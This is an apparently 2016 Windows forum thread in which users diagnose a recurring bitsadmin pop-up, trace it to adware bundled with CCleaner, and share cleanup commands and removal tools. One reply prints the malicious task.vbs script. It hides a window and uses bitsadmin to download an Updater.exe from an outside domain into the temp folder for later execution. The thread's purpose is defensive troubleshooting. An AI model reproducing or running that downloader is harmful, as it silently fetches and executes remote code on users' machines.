Windows 10: Bitsadmin pops up randomly and immediatly disappears (take 2?)
Bitsadmin pops up randomly and immediatly disappears (take 2?)
I hate to start naming people off here like an assembly line, but I find myself in the same situation as @tkrisz0403 in that my Command Prompt, accompanied by the exact same text as the former case, as seen in the first screen shot I provide which I managed to capture using OBS studio (please feel free to snoop through my dungeons and dragons writing at your leisure . I proceeded to follow some of the advice provide by @Hydranix and @Superfly by proceeding to download the bitsadmin buster.zip, which did promptly catch and freeze the process. The txt it provided was also identical, "Parent Process Name: cmd.exe" (of which I'll also produce a screenshot, mainly because I'm not knowledgeable enough to do anything else in a forum)
I then went on with further with the instructions in that particular forum, first entering "Get-BitsTransfer -AllUsers | select -ExpandProperty FileList | Select -ExpandProperty RemoteName" into powershell as recommended by @Superfly, which gave me slightly different results. Still, cloudfront.net appeared to be the issue, as it came up in an almost identical fashion as in @tkrisz0403 's case. I proceeded to enter the command prompt provided by @Superfly;
net stop BITS
del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
net start BITS
net stop wuauserv
net start wuauserv"
It was at this point the results appeared different enough that I, not being an expert in this field, didn't want to go any further, the results of which again being posted in a screen shot. I've downloaded ADWcleaner, which was the next recommended step to check for the possibility of malware, which I firmly believe it is, but have ceased to move forward until some fine chap comes along and tells me "Aw, you adorable little monkey, here, do this," and out of the kindness of their hearts decides to guide me through this process. I hope to hear from anyone and everyone soon, and I drink to your health and good fortune. Cheers ... (Hm, that emoji doesn't quite do me justice. I'm not a drunk, I'm just Irish, I swear.)
P.S. As an additional update, while typing this, I do believe I did see the command prompt pop up again, though I wasn't thoroughly paying attention and cannot be certian. Could be paranoia. Could the buster ceased to work after a time. I'm not sure. As an additional precaution, I'm posing yet another screen of the command prompt that stayed after downloading and executing the bitsadmin buster.exe, though it is and has been completely blank. If there is any other information I can provide, I won't hesitate to do so.
Its a Google toolbar usually bundled with Ccleaner....a snooper, potentially unsafe.
To eradicate in Safe Mode...Hitman Pro or ADWcleaner.
Just a quick fyi for CCleaner users (like me): one week after a new edition hits their CCleaner builds page, they post a "slim" version of the program that has no bundleware in it at all. If you're willing to wait, you can skip that extra add-in altogether.
For example, ccsetup524.exe showed up on the site on Monday, Nov 14, I believe. That means ccsetup524-slim.exe should show up on 11/21. I'll wait to download and install that one, instead of the "Standard installer" version.
Thanks for tip Ed....a bit naughty in the first place CCleaner not notifying installed bundleware came with the package.
I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.
See here for removal instructions.
Confirmation of what was installed with CCleaner.....note the name change from your posted link but unmistakable connection.
OK, thanx for checking that out - what we need to do now, is find that script and see what it calls via bitsadmin.
PS: Assuming we are on the right path with this....
The task.vbs apparently contains this:
It creates a bits job called "amijob" then downloads an updater exe to the temp folder. Waits a set period (I guess for the download to complete), it then cancels the bitsjob. Assuming another task then runs the updater from temp.
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe C:\Users\Tejas\AppData\Local\Temp\amiupdater912.exe",0,False)
cmds=WshShell.RUN("bitsadmin /cancel amijob",0,False)
Set WshShell = Nothing
Info: Malware scan of task.vbs 04f5d27e461b2ff0da24b6a367b81d6d4d3c817d - Reason Core Security Labs
Last edited by Superfly; 16 Nov 2016 at 13:57.
Quite a lot on my machine.....red markings my name.....how to differentiate between M$ and any intruder?...I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
Those are fine - they are just the executable and dependencies in the components folder... it's the hidden scripts that call it, that's the problem.
A bit off topic this but bitlocker will not do anything to stop you getting infected. Whether you have it turned on or not is transparent to programs running on your PC. It is to stop people getting information off your disk if you leave your laptop in a taxi or whatever.
Bitsadmin window pops up in every hour/50 minutes and immediately disappear which is very annoying. I've run KasperskyTotal Security and Malwarebytes but they have not found the problem. I made a screenshot from the problem. Any help would be...
I manged to get a screenshot of it. http://prntscr.com/bhep02
I have gone through and read one thread that looks as if I am having the exact problem as them, but I did not want to go off of someone else's problems even though they are very...
During the day a cmd window will pop up and immediately disappear without warning, kicking me out of fullscreen applications and being a general annoyance. I suspect something more sinister but Windows Defender, Malwarebytes and SuperAntiSpyware...
connecting a bog standard laptop (display res 768 X 1366) to a second monitor and setting that as the primary display (HD 1920 X 1080) the bottom taskbar randomly disappears or becomes non functional. The strange thing is that if I...